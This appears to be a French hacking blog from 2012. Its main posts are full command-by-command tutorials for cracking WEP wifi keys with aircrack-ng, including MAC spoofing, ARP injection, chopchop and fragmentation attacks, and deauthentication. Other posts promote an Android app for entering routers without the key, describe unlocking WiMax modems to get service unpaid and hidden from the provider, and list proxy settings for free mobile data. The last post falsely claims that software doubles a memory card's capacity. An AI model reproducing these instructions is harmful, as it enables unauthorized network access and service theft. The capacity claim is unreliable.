jeudi 13 septembre 2012

LE PRINCIPE :


Voici l'explication de la manipulation que nous allons effectuer pour cracker un réseau wifi.
Tout d'abord voici une mise en situation avec la représentation d'un réseau wifi :
alt


Chaque ordinateur échange des données avec le point d'accès wifi,
ces données sont cryptées via une clé.

Plusieurs types de cryptage par clé existent,
les deux plus répandus sont le cryptage par clé WEP et le cryptage par clé WPA.

Dans ce tutoriel nous allons cracker une clé WEP, les cryptages WPA sont très difficiles à cracker
car vous devez utiliser un crack par liste de mots (dictionnaires), et cela peut être très très long car le
programme doit tester chaque mots contenu dans cette liste manuellement.
Sous entendu aussi que la clé WPA doit être un mot et non une suite illogique de lettres et de chiffres.

Passons plutôt au cryptage WEP,
qui est lui plus facile étant donné une faille présente dans les packets ARP
(données de type ARP qui transitent entre le point d'accès wifi et un pc).

Voici l'exemple d'une clé WEP que l'on aura à trouver pour pouvoir se connecter sur le point d'accès :
Elle sera du type : FF:0E:0F:92:28:16:57:5B:F5:55:76:3A:DE

Note : pour se connecter via windows on entrera la clé de cette manière : FF0E0F922816575BF555763ADE

Pour trouver cette clé nous allons devoir aller à la pêche aux données du type ARP,
nous utiliserons un donc un sniffer qui s'appelle airodump pour capturer ces données
qui transitent sur le réseau wifi.

Mais pour capturer assez de données ARP, il faut que le point d'accès wifi soit quelque peut stimuler.
Nous allons donc le faire "parler" en lui injectant des données via le wifi grace à aireplay.

Cette injection de packet ARP va générer des IVS, très important car c'est le nombre d'IVS capturé qui va nous permettre de cracker la clé WEP, compter environ 40 000 IVS pour un clé WEP.
En utilisation normale vous pouvez obtenir jusqu'a 300 IVS par seconde.
Soit environ 3 minutes pour obtenir assez d'IVS pour cracker la clé WEP.

Une fois que l'on aura assez de données capturer,
on pourra alors exploité la faille de ce protocole de communication.
A l'aide de l'outil aircrack nous allons lancer une analyse des données qui permettra d'obtenir la clé.


OUTILS ET CONNAISSANCES NÉCESSAIRES :


Pour le crackage d'un réseau wifi nous aurons besoin de différents outils ainsi que un peu de connaissances sur les systèmes Linux. Vous pouvez aussi trouver des wikis sur le crackage sous Windows mais je le déconseille fortement car ce n'est pas aussi efficace que sous Linux.

L'intégralité du wiki ce déroulera en ligne de commande, et demande une certaine rigueur et patience
et quelques connaissances Linux et sur le Wifi.
Il faudra aussi disposer d'une carte wifi compatible en mode MONITORING
et d'un espace de stockage type clé usb ou autre.

Pour commencer utilisez la distribution Linux spécialement prévu pour les tests de sécurité réseau.
Il s'agit de la distribution Backtrack disponible ici
Enregistrer le fichier ISO sur votre PC puis graver le sur un CD.

Si vous souhaitez vous pouvez très bien installer les outils sur votre propre distribution Linux.

UTILISATION DU LIVE CD BACKTRACK :


Après avoir graver l'image de la distribution BackTrack via un logiciel de gravure,
nous somme prêts pour débuter le wiki.

- Placer le CD dans votre lecteur, puis redémarrer.
- Au démarrage de votre ordinateur, celui doit Booter sur le CD.
- Un choix vous est alors proposé.
- Sélectionner l'interface KDE et démarrer BackTrack.
- Après chargement vous arrivez sur un interface graphique type KDE.

Nous voici prêt pour débuter le crackage de votre réseau wifi.

ACTIVATION DU MODE MONITORING DE VOTRE CARTE WIFI :


Vous devez avant toute chose, basculer votre carte wifi dans son mode Monitoring,
ce qui va permettre à votre carte wifi de capter des données sur le réseau wifi et surtout d'injecter sur le réseau.
Pour basculer dans ce mode nous allons utiliser un outil qui s'appelle : airmon-ng

Toujours dans la fenêtre de commande, voici comment utiliser aimon-ng

Activer le mode monitoring : airmon-ng start inferface
Désactiver le mode monitoring : airmon-ng stop interface

Dans notre exemple on utilisera :

airmon-ng start eth0

Si la carte a basculé en mode monitoring vous devriez avoir la phrase "monitor mode enabled",
comme ci dessous :
alt

RÉCUPÉRATION DES INFORMATIONS SUR LES RÉSEAUX WIFI AU ALENTOUR :


Maintenant vous êtes prêt pour commencer l'analyse des réseaux wifi.
Pour cela vous devez utiliser l'outil : airodump-ng
Cet outil va nous permettre de scanner les réseaux wifi disponible
et par la suite de capturer les données (packets) qui transitent par le wifi.

Voici comment obtenir la liste des réseaux wifi que votre carte wifi capte :

Scan avec airodump-ng : airodump-ng interface

Dans notre exemple nous utiliserons :

airodump-ng eth0

Voici le résultat de cette commande :
alt


On retrouve des informations importantes sur ce listing.
Voici les éléments qu'il faudra noter pour une utilisation futur.

Sur la première ligne en rouge (la liste des points d'accès wifi) :

- Le nom du point d'accès : test
- L'adresse MAC du point d'accès : 13:28:11:75:E7:08
- Le numéro de channel (ch) : 1

- L'adresse MAC du PC qui est associé au point d'accès visé : 00:C0:CA:11:CC:D5

Note : la partie #/s sera importante par la suite pour vérifier si l'injection fonctionne et ainsi optenir des IVS néccessaires au programme aircrack qui utilise ces données pour trouver le bonne clé de sécurité.

La deuxième en rouge est optionnelle, mais la liste des connexions entre PC et point d'accès wifi permet de contourner un éventuel filtrage MAC en ce falsifiant  sa propre adresse MAC via la commande :

macchanger --mac NOUVELLE_ADR_MAC INTERFACE

soit dans l'exemple:

macchanger --mac 00:C0:CA:11:CC:D5 eth0

CAPTURE DES DONNÉES QUI TRANSITENT EN WIFI :


Une fois que vous avez noté les différentes informations sur le point d'accès que vous ciblez,
Ouvrez une nouvelle fenêtre / onglet de la console (ligne de commande).

Pour l'étape suivante vous aurez besoin d'un espace disque
(soit une clé usb, un disque dur externe, ou encore une partition)

Placez vous dans votre espace de stockage via la commande linux  "cd votre/chemin/"

Notes : "ls" pour lister un répertoire, "cd" pour ce placer dans le répertoire.
Votre commande devrait être du style cd /mnt/sda1/ (Pour une clé usb).
Vous devez laisser le programme ouvert durant le reste de la manipulation, car c'est lui qui
enregistrera les données du réseau.

Une fois placé sur votre clé USB vous pouvez commencer la capture des données  (sniffing)
via cette commande : airodump-ng --write nomdufichierdesortie --channel NumeroChannel Interface

Ce qui donnera dans notre exemple :

airodump-ng -write capture -c 1 eth0

Note : Le "-c 1" est optionnel, mais il permet de capturer uniquement les données qui transitent sur le canal 1

Une fois la commande exécutée vous devriez voir la même capture vue plus haut,
sauf que cette fois les données sont enregistrées dans un fichier.

Vous allez donc pouvoir débuter la fausse association auprès du point d'accès wifi.

Important :
Vous devez laisser le programme fonctionner pendant toute la durée du crackage du réseau wifi.

COMMENT EFFECTUER UNE FAUSSE ASSOCIATION AVEC LE POINT D'ACCÈS WIFI ?


Cette étape n'est pas obligatoire, mais permet de vérifier si le point d'accès possède un filtrage mac ou pas.
Cependant j'ai remarqué que la capture des données "utiles", fonctionne mieux si la fausse association est réalisée.
Pour effectuer notre fausse association auprès du point d'accès nous allons utiliser "aireplay-ng".
Ouvrez une autre invite de commande puis utilisez airepay comme ci dessous :
Commande : aireplay-ng -1 0 -e NOM_AP -a MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

NOM_AP : Le nom du point d'accès
MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dûs à l'injection trop rapide des données sur le réseau wifi.
Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimal entre 50 et 200

Ce qui donnera dans notre exemple :

aireplay-ng -1 0 -e test -a 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Voici la capture d'une fausse association réussie :
alt


INJECTION DE DONNÉES SUR LE RÉSEAU WIFI :


Pour commencer cette partie, vous devez vérifier certains points :
- Airodump-ng capture bien les données sur votre clé usb (par exemple)
- Vous avez toutes les informations nécessaires, ESSID, BESSID du point d'accès.

Pour injecter des packets sur le réseau,
nous allons utiliser le même programme que pour l'association : "aireplay-ng"
L'injection de packet permettra de générer du traffic et donc de stimuler le routeur wifi pour qu'il génère des données utiles au crackage de la clé WEP (IVS).

Il existe 3 méthodes pour injecter des données sur le réseau wifi.

- La méthode ré-injection de packets (-3) : qui signifie que le programme va attendre de capturer un packet ARP pour ensuite l'injecter sur le réseau.

- La méthode ChopChop (-4) : le programme va générer un faux paquet ARP et va l'envoyer sur le réseau wifi.

- La méthode par fragmentation (-5) : le programme va générer des keystream valides, ce qui va nous permettre de générer un packet ARP par la suite et de l'envoyer.

LA MÉTHODE RÉ-INJECTION ARP (AIREPLAY-NG -3) :


Cette méthode est la plus simple à mettre en oeuvre, car elle permet de capturer directement le packet ARP et de le renvoyer sur le réseau wifi. Vous n'avez plus qu'a attendre la génération de IVS.

Très important, le programme airodump-ng doit être en fonctionnement et enregistrer les données.
(Voir plus haut dans la partie capture des données wifi)

Utilisation : aireplay-ng -3 -b MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dû à l'injection trop rapide des données sur le réseau wifi.
Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimales entre 50 et 200


Ce qui donnera dans notre exemple :

aireplay-ng -3  -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Voici une capture d'écran qui montre le programme en cours ré-injection de packet ARP.
Les informations importantes sont en rouge.

LA MÉTHODE CHOPCHOP (AIREPLAY-NG -4) ET FRAGMENTATION (AIREPLAY-NG -5) :


Les méthodes ChopChop et Fragmentation sont très efficaces lorsque le routeur ne communique pas beaucoup de données ou lorsque personne n'est connecté au routeur.

Voici la commande pour la méthode chopchop :

aireplay-ng -4 -b MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

Voici la commande pour la méthode fragmentation :

aireplay-ng -5  -b MAC_AP -h MAC_PC -x PACKETS/S INTERFACE

Ce qui donnera dans notre exemple pour l'attaque Chopchop :

aireplay-ng -4  -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Et pour l'attaque par fragmentation :

aireplay-ng -5  -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -x 100 eth0

Lorsque le programme capturera des données, elles seront utilisées pour créer un packet ARP, qui pourra ensuite
être utilisé pour générer des IVS.

Voici une capture d'écran pour l'attaque chopchop :




Note importante
Une fois que le programme a fini (100%) de générer le packet, celui ci enregistre 2 fichiers
un fichier cap et un fichier xor, notez bien les 2 noms et chemin de ces fichiers.

Une fois que le programme a généré un fichier .XOR et .CAP, il faut créer un packet ARP valide à l'aide de packetforge-ng



GÉNÉRER UN PACKET ARP VALIDE AVEC PACKETFORGE-NG : (UNIQUEMENT SI VOUS AVEZ UTILISÉ LA MÉTHODE CHOPCHOP OU FRAGMENTATION)


Une fois que l'attaque chopchop ou fragmentation a enregistré les deux fichiers .xor et .cap, nous allons pouvoir créer un packet ARP valide pour ensuite le renvoyer au routeur pour  obtenir des IVS.

Voici la commande :

packetforge-ng -0 -a MAC_AP -h MAC_PC -k 192.168.1.1 -l 255.255.255.255 -y FILE_XOR -w FILE.cap

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
FILE_XOR : Nom du fichier xor précédemment enregistré
FILE.cap : Nom du fichier à enregistrer.

Ainsi dans notre exemple cela donnera :

packetforge-ng -0 -a 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -k 192.168.1.1 -l 255.255.255.255 -y replay_dec-0212-224255.xor -w arp.cap

Notes : Le paramètre k permet de définir l'ip distante soit ici dans la plupart des cas l'adresse ip du routeur soit : 192.168.1.1. Dans certain cas, vous pouvez aussi utiliser l'adresse IP 255.255.255.255 pour les deux paramètres -k et -l


RENVOI DU PACKET ARP :
(UNIQUEMENT SI VOUS AVEZ UTILISÉ LA MÉTHODE CHOPCHOP OU FRAGMENTATION)

Lorsque vous avez votre fichier arp.cap créer par packetforge-ng, vous pouvez maintenant le renvoyer au routeur via aireplay-ng. Ainsi ce fichier ARP valide permettra d'obtenir des IVS.

Très important, le programme airodump-ng doit être en fonctionnement et enregistrer les données.
(Voir plus haut dans la partie capture des données wifi)

Voici la commande :

aireplay-ng -3 -b MAC_AP -h MAC_PC -r FILE_ARP -x PACKETS/S INTERFACE

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
FILE_ARP : L'adresse mac du point d'accès
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dû à l'injection trop rapide des données sur le réseau wifi. Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimales entre 50 et 200

Ainsi dans notre exemple cela donnera :
aireplay-ng -3 -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -r arp.cap -x 100 eth0Note : Le fonctionnement reste le même que vu plus haut, normalement le nombre de PPS doit monter (en fonction bien sur de votre vitesse de transmission -x

CRACK DE LA CLÉ WEP AVEC AIRCRACK-NG :


Une fois que vous avez capturé assez de données avec airodump-ng et que aireplay-ng a généré assez d'IVS,
vous pouvez alors trouver la clé wep via le programme aircrack-ng.

Commande : aircrack-ng FICHIERS.CAP

FICHIER.CAP : noms des fichiers capturé par airodump-ng, utilisé * pour tous les séléctionnés

Dans notre exemple :


aircrack-ng *.cap 


Notes : Compter environ 10 à 20 minutes en fonction de la vitesse et de la distance du point d'accès pour que le programme aircrack-ng puisse trouvé la clé.
Pour une clé wep, il faut environ 40 000 IVS
Pour un décryptage plus rapide, vous pouvez utiliser le paramètre -x ( aireplay-ng -x *.cap )

Vous devrez alors sélectionner le réseau puis le programme se charge du reste.

Capture d'écran d'une clé WEP trouvée :

dimanche 9 septembre 2012

Cracker un réseau Wifi sécurisé (WEP) II





 crack hack wifi Cracker un réseau WiFi sécurisé (WEP)

Aujourd'hui je vais vous montrer comment cracker un réseau sans fil protégé avec une clef WEP peu importe sa taille, et pourquoi faire ? disant dans le cadre d’un audit de sécurité par exemple et non pas pour nuire à vos voisins, vous êtes avertis ! pour faire, nous utiliserons la suite air crack-ng disponible dans la distribution Linux BackTrack afin de gagner du temps.

Prérequis:

- Une carte Wifi compatible avec le mode monitoring et injection de paquets (lien)
- La suite air crack-ng (lien) disponible dans la distribution BackTrack (lien)

 

 

On commence:

1 – Démarrage de l’interface Wifi (wlan0) en mode monitor, afin d’intercepter le trafic réseau sans fil, même s’il n’est pas adressé à notre machine.

air mon-ng start wlan0

backtrack hack wifi wep 01 Cracker un réseau WiFi sécurisé (WEP)

2 – Démarrage d’un scan des réseaux sans fil disponibles, dans mon cas en utilisant l’interface mon0

airodump-ng mon0

backtrack hack wifi wep 02 Cracker un réseau WiFi sécurisé (WEP)

3 – Maintenant que j’ai les informations (et paramètres) du réseau sans fil ciblé :
ESSID : dark-box
                    BSSID : 00:1C:C5:0A:5C:05
Channel (CH) : 11
Je vais arrêter la précédente commande, et lancer une nouvelle plus précise avec les nouveaux paramètres, tout en enregistrant le trafic capturé dans un fichier output

1 #commande:
2 airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
3
4 # explication:
5 airodump-ng --channel {numéro du channel} --write {nom du fichier de capture} --bssid {adresse MAC wifi du routeur} {interface wifi en mode monitoring}

backtrack hack wifi wep 03 Cracker un réseau WiFi sécurisé (WEP)

4 – Dans une nouvelle console, je vais procéder à l’injection de paquets ARP (aireplay) pour stimuler le réseau et accélérer la capture des IVs nécessaires pour la réussite de l’attaque.

1 # commande:
aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
3
4 # explication:
5 aireplay-ng --arpreplay -e {ESSID du routeur} -b {adresse MAC wifi du routeur} -h {adresse MAC wifi d'une station connectée au routeur} {interface wifi en mode monitor}
backtrack hack wifi wep 041 Cracker un réseau WiFi sécurisé (WEP)


 5 – Dans une autre nouvelle console, je lance air crack pour casser la clef WEP en définissant le fichier de capture output*.cap

1 air crack-ng output*.cap

backtrack hack wifi wep 06 Cracker un réseau WiFi sécurisé (WEP)


laissé tourner, et en moins de 10 minutes vous obtiendrez la clef WEP, ici dans mon cas elle a une longueur de 128 bits, et je peux l’utiliser par la suite pour me connecter au réseau Wifi attaqué.
backtrack hack wifi wep 07 Cracker un réseau WiFi sécurisé (WEP)
 
Récapitulatif des commandes :
1-root@imbh:~# airmon-ng start wlan0
2-root@imbh:~# airodump-ng mon0
3-root@imbh:~# airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
4-root@imbh:~# aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
5-root@imbh:~# aireplay-ng --deauth 10 -a 00:1C:C5:0A:5C:05 -c 00:1C:BF:AB:35:B5 mon0
6-root@imbh:~# aircrack-ng output*.cap 

Mon article arrive à sa fin, il a a été rédigé en testant la sécurité de mon propre réseau sans fil, alors inutile de me pointer du doigt en me disant : t’es un vilain

En espérant qu’il vous a plu, je vous dis portez-vous bien et n’hésitez pas à me faire part de vos questions, ou autre..

 

Cracker les réseaux Wifi avc Android

 

Le Ministère de la Culture nous avait expliqué il y a peu qu’il suffisait d’affirmer qu’un réseau sans-fil est protégé pour être lavé de tous soupçons de téléchargement illégal, malgré le fait qu’un outil permettant de contourner les protections en théorie inviolable de la protection WPA 2 soit paru sur la toile…

Voici une autre preuve qu’il est très facile de pirater des réseaux sans-fil, cette fois sans avoir besoin d’ordinateur, mais carrément depuis votre téléphone portable !

Penetrate est une application pour Android qui permet de vous connecter à certains routeurs Wifi (et donc d’accéder à leurs réseaux) sans avoir besoin de la clé de sécurité.

Comment cela marche-t-il ? Penetrate utilise des failles dans la génération des clés de sécurité au sein de certains routeurs et box Internet. Il scanne les réseaux Wifi aux alentours et vous signale ceux qui sont potentiellement piratables.


 








Une fois l’application installée, il vous suffit de télécharger le dictionnaire qui contient les mots de passe répertoriés pour les routeurs Thomson et vous avez un téléphone capable de tester la sécurité des marques de routeurs suivantes :

    SpeedTouch, Thomson, Orange, DMax, BBox, Infinitum, Otenet, Cyta
    DLink
    Pirelli Discus

C’est un logiciel qui commence à dater, mais puisque cela fait longtemps qu’il n’est plus disponible sur l’Android Market et que nous sommes actuellement en plein dans une actualité où une organisation gouvernementale prétend que son réseau ne peut pas être utilisé pour des usages non-prévus, j’ai pensé que cela pourrait peut-être vous intéresser.


Penetrate est disponible sur le site de Cachem, que je salue au passage pour avoir déterré il y a peu cette petite merveille des archives du net.


Au passage, si vous souhaitez encore vous amuser avec votre téléphone Android pour utiliser des usages non-prévus du Wifi, je vous recommande de jeter un coup d’oeil à cet article.










samedi 8 septembre 2012

METHODE POUR CRACKER UNE CLE WIMAX


La technologie WiMax est un standard de transmission de données, sans fil, donné pour fonctionné à 70 Mb/s sur une portée de 50 km. Plus concrètement, le WiMax ressemble de prés au Wi-Fi, mais avec des performances nettement supérieures.

Du fait des coûts exagérément élevés appliqués par les FAI. Certains hackers se sont attelé à trouver des parades pour surfer gratuitement.

Ce post sera donc mis a jour progressivement au fur et a mesure que de nouvelles méthodes de hacking seront découverte.

Mais avant il est important de vous rappeler que ce tuto a été fait dans le but d'aider la communauté et que si vous choisissez de suivre ce tuto, c'est à vos propres risques.. Have Fun !

Tuto pour le FAI  MTN Côte d'Ivoire

voici le logiciel qui le fait: Beceem diagnostic

il suffit de modifier le code source de la clé en changeant certains parametres qui sont entres autres :
1- paramtres bios/id
2- l'adresse MAC
3- Syst I/O
voir images ici :  

étape 1
étape 2
étape 3
étape 4
étape 5

En modifiant les informations le logiciel débloquera la clé, vous serais alors invisible aux yeux de votre fournisseur d’accès internet. Merci

mercredi 5 septembre 2012

PARAMETRE HANDLER POUR TOUTES VOS APPLICATIONS

APPLICATION HANDLER

Ucweb Handler, ebuddy handler, facebook mobile handler, shmessenger handler, skype handler, google maps handler, opera mini peu importe la version. . .

Parametre à utiliser:
Profil  : Oworld
Proxy : 95.110.159.54
Port    : 8080
Parametre Handler :
Proxy type : host
Proxy server : m.wikipedia.org

Note: le compte doit être actif

NAVIGATEUR DU FONE DIRECT

PROFIL:owap,owap
PROXY:
109.87.85.224:54321
174.140.163.100:3128
187.32.92.33:3128
109.87.85.224:54321

page d'accueil: Ivoirehacking.blogspot.com


mardi 4 septembre 2012

CONVERTIR SA CARTE MEMOIRE 1Go EN 2Go

PRÉSENTATION

1. Insérez la carte mémoire sur votre PC.

2. Gardez une copie de sauvegarde des données de votre carte mémoire, car il est nécessaire pour vous de formater la carte.

3.Téléchargez et installez le logiciel SKYMEDI

4. Après l'installation, l'application se lance automatiquement et affiche une fenêtre avec les options "Réparer"
et "Annuler". Depuis le menu déroulant, vous devez parcourir la carte mémoire.  





5. Une fois que vous sélectionnez l'emplacement de la carte, cliquez sur "Fix", il vous sera demandé pour la confirmation, vous devez cliquer sur "Oui". Après avoir sélectionné la carte mémoire, l'application va vous montrer une taille d'environ 955MB, c'est parce que vous avez inséré une carte mémoire de 1Go.

6. Après avoir terminé le processus, l'application va vous demander de débrancher la carte mémoire. Retirez-la et insérez-la à nouveau. Maintenant, la capacité de stockage de la carte mémoire est augmentée de 2 Go.


 

7. Si vous voulez vérifier le stockage de la carte mémoire, vous pouvez cliquer sur mon ordinateur - Carte mémoire> -> Sélectionnez Propriétés. Vous verrez que la taille de la carte mémoire est de 2 Go. Si vous utilisez Windows Vista7, vous verrez "Poste de travail" au lieu de "Poste de travail". Ouvrez que le clic droit sur ​​la carte mémoire, sélectionnez Propriétés et vous serez en mesure de vérifier la taille de la carte mémoire.

8. Il y'a une autre façon de confirmer la capacité de stockage. Rouvrir la Skymedi et sélectionnez l'emplacement de la carte mémoire. Cette fois-ci, il affichera 1912KB, qui est de 2 Go.

Important: Il est possible que le logiciel ne fonctionne pas sur certaines cartes mémoire, si cela ne fonctionne pas dans un premier temps. Ne pas essayer à plusieurs reprises. Il peut en résulter des dommages dans la carte mémoire tel que le formatage automatique de votre carte.